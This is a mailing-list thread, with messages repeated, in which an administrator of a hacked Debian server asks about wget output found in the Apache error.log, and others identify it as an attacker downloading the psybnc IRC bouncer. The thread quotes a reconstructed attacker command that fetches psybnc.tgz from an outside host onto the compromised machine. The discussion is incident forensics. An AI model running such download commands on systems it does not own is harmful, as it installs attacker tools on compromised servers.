Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 12:04:58PM +1100, Russell Coker wrote: > Looks like they used wget to download psybnc, it's an IRC bot. No, psybnc is an IRC bouncer and the archive includes a binary and the sources: | $ file psybnc | psybnc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, statically linked, stripped So i assume its a script kiddy which wants to abuse several IRC servers. Bastian -- Superior ability breeds superior ambition. -- Spock, "Space Seed", stardate 3141.9 signature.asc Description: Digital signature
Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 12:04:58PM +1100, Russell Coker wrote: > Looks like they used wget to download psybnc, it's an IRC bot. No, psybnc is an IRC bouncer and the archive includes a binary and the sources: | $ file psybnc | psybnc: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), for GNU/Linux 2.0.0, statically linked, stripped So i assume its a script kiddy which wants to abuse several IRC servers. Bastian -- Superior ability breeds superior ambition. -- Spock, "Space Seed", stardate 3141.9 signature.asc Description: Digital signature
Re: strange apache error.log entry
François TOURDE wrote: Le 12438ième jour après Epoch, [EMAIL PROTECTED] écrivait: Hi, can you tell me what the following means in an apache error.log and The log is the out put of wget command.Most probably the command which resulted in this entry is "wget http://www.geocities.com/fonias28/psybnc.tgz -o /var/log/apache/error.log" Or just a php script allowing execution of commands, then wget was launched this way... Check your machine, it can be compromised :) I already know that the machine got compromised, I came across these log lines while searching which hole was used... best regards markus
Re: strange apache error.log entry
Jan Minar wrote: On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote: I don't know what the surrounding lines are, but the core of your posting is a wget(1) logfile/stderr output :-) This isn't the standard wget in the main distribution; IIRC, it's the busybox' one. Busybox' small footprint makes it ideal for floppy-based distros & rescue disks (such as Debian boot-floppies). sure, i know what wget is ;-) the interesting thing is that these lines are in the apache log-file (the surrounding two lines belong to apache) best regards /var/log/apache/error.log: [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg Beginning of wget output: --14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz 14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509] End of wget output (maybe the following blank line belongs to it, too). [Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg
Re: strange apache error.log entry
François TOURDE wrote: Le 12438ième jour après Epoch, [EMAIL PROTECTED] écrivait: Hi, can you tell me what the following means in an apache error.log and The log is the out put of wget command.Most probably the command which resulted in this entry is "wget http://www.geocities.com/fonias28/psybnc.tgz -o /var/log/apache/error.log" Or just a php script allowing execution of commands, then wget was launched this way... Check your machine, it can be compromised :) I already know that the machine got compromised, I came across these log lines while searching which hole was used... best regards markus -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
Jan Minar wrote: On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote: I don't know what the surrounding lines are, but the core of your posting is a wget(1) logfile/stderr output :-) This isn't the standard wget in the main distribution; IIRC, it's the busybox' one. Busybox' small footprint makes it ideal for floppy-based distros & rescue disks (such as Debian boot-floppies). sure, i know what wget is ;-) the interesting thing is that these lines are in the apache log-file (the surrounding two lines belong to apache) best regards /var/log/apache/error.log: [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg Beginning of wget output: --14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz 14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509] End of wget output (maybe the following blank line belongs to it, too). [Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
Le 12438ième jour après Epoch, [EMAIL PROTECTED] écrivait: > Hi, > >> can you tell me what the following means in an apache error.log and > > The log is the out put of wget command.Most probably the command which > resulted in this entry is "wget > http://www.geocities.com/fonias28/psybnc.tgz -o > /var/log/apache/error.log" Or just a php script allowing execution of commands, then wget was launched this way... Check your machine, it can be compromised :) -- Our houseplants have a good sense of humous.
Re: strange apache error.log entry
On Wed, 21 Jan 2004 11:28, Markus Schabel <[EMAIL PROTECTED]> wrote: > hello folks! > > can you tell me what the following means in an apache error.log and > where it comes from? I've searched through all other apache log files > but didn't find something that could generate this. > (sure, the server got hacked and is out-of-order now...) > > > /var/log/apache/error.log: > >> [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not > >> exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg --14:59:21-- > >> http://www.geocities.com/fonias28/psybnc.tgz > >>=> `psybnc.tgz' Looks like they used wget to download psybnc, it's an IRC bot. -- http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux packages http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark http://www.coker.com.au/postal/Postal SMTP/POP benchmark http://www.coker.com.au/~russell/ My home page
Re: strange apache error.log entry
Hi, > can you tell me what the following means in an apache error.log and The log is the out put of wget command.Most probably the command which resulted in this entry is "wget http://www.geocities.com/fonias28/psybnc.tgz -o /var/log/apache/error.log" Rgds, Girish. --
Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote: I don't know what the surrounding lines are, but the core of your posting is a wget(1) logfile/stderr output :-) This isn't the standard wget in the main distribution; IIRC, it's the busybox' one. Busybox' small footprint makes it ideal for floppy-based distros & rescue disks (such as Debian boot-floppies). > >/var/log/apache/error.log: > >>[Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not > >>exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg Beginning of wget output: > >>--14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz > >>14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509] End of wget output (maybe the following blank line belongs to it, too). > >> > >> > >>[Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not > >>exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg HTH. -- Jan Minar "Please don't CC me, I'm subscribed." x 9 pgpPHyVItt7bn.pgp Description: PGP signature
Re: strange apache error.log entry
Le 12438ième jour après Epoch, [EMAIL PROTECTED] écrivait: > Hi, > >> can you tell me what the following means in an apache error.log and > > The log is the out put of wget command.Most probably the command which > resulted in this entry is "wget > http://www.geocities.com/fonias28/psybnc.tgz -o > /var/log/apache/error.log" Or just a php script allowing execution of commands, then wget was launched this way... Check your machine, it can be compromised :) -- Our houseplants have a good sense of humous. -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
On Wed, 21 Jan 2004 11:28, Markus Schabel <[EMAIL PROTECTED]> wrote: > hello folks! > > can you tell me what the following means in an apache error.log and > where it comes from? I've searched through all other apache log files > but didn't find something that could generate this. > (sure, the server got hacked and is out-of-order now...) > > > /var/log/apache/error.log: > >> [Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not > >> exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg --14:59:21-- > >> http://www.geocities.com/fonias28/psybnc.tgz > >>=> `psybnc.tgz' Looks like they used wget to download psybnc, it's an IRC bot. -- http://www.coker.com.au/selinux/ My NSA Security Enhanced Linux packages http://www.coker.com.au/bonnie++/ Bonnie++ hard drive benchmark http://www.coker.com.au/postal/Postal SMTP/POP benchmark http://www.coker.com.au/~russell/ My home page -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
Hi, > can you tell me what the following means in an apache error.log and The log is the out put of wget command.Most probably the command which resulted in this entry is "wget http://www.geocities.com/fonias28/psybnc.tgz -o /var/log/apache/error.log" Rgds, Girish. -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
Re: strange apache error.log entry
On Wed, Jan 21, 2004 at 01:28:32AM +0100, Markus Schabel wrote: I don't know what the surrounding lines are, but the core of your posting is a wget(1) logfile/stderr output :-) This isn't the standard wget in the main distribution; IIRC, it's the busybox' one. Busybox' small footprint makes it ideal for floppy-based distros & rescue disks (such as Debian boot-floppies). > >/var/log/apache/error.log: > >>[Sun Jan 18 14:54:35 2004] [error] [client 80.142.221.116] File does not > >>exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg Beginning of wget output: > >>--14:59:21-- http://www.geocities.com/fonias28/psybnc.tgz > >>14:59:24 (273.38 KB/s) - `psybnc.tgz' saved [577509/577509] End of wget output (maybe the following blank line belongs to it, too). > >> > >> > >>[Sun Jan 18 15:23:42 2004] [error] [client 217.24.233.220] File does not > >>exist: /var/www/sammy/www/bc-nrw/images/halb_banner_med.jpg HTH. -- Jan Minar "Please don't CC me, I'm subscribed." x 9 pgp0.pgp Description: PGP signature